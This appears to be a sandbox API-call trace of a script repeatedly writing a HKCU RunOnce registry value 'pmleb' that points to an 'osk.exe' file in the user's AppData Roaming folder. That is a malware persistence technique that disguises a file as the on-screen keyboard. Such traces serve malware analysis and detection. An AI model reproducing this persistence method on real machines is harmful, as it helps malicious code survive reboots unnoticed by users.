FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.018] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5a [0082.018] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.018] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.018] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.018] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.018] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.018] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.018] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.019] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.019] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.019] RegCloseKey (hKey=0x280) returned 0x0 [0082.019] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.019] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.019] SetTimer (hWnd=0x20280, nIDEvent=0x20d6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d6 [0082.019] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.031] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.031] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.031] KillTimer (hWnd=0x20280, uIDEvent=0x20d6) returned 1 [0082.031] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.031] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.031] IUnknown:Release (This=0x787518) returned 0x1 [0082.032] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.032] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.032] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.032] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.032] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5b [0082.032] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.032] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5c [0082.032] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.033] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5b [0082.033] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.033] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.033] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.034] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.034] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.034] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.034] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.034] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.034] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.034] RegCloseKey (hKey=0x280) returned 0x0 [0082.035] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.035] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.035] SetTimer (hWnd=0x20280, nIDEvent=0x20d7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d7 [0082.035] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.046] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.046] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.046] KillTimer (hWnd=0x20280, uIDEvent=0x20d7) returned 1 [0082.046] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.046] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.046] IUnknown:Release (This=0x787518) returned 0x1 [0082.047] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.047] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.047] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.047] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.047] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c [0082.047] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.047] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5d [0082.047] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.048] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c [0082.048] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.049] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.049] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.049] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.049] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.049] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.049] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.049] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.049] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.049] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.050] RegCloseKey (hKey=0x280) returned 0x0 [0082.050] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.050] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.050] SetTimer (hWnd=0x20280, nIDEvent=0x20d8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d8 [0082.050] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.061] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.061] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.062] KillTimer (hWnd=0x20280, uIDEvent=0x20d8) returned 1 [0082.062] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.062] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.062] IUnknown:Release (This=0x787518) returned 0x1 [0082.062] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.062] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.062] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.063] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.063] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0082.063] 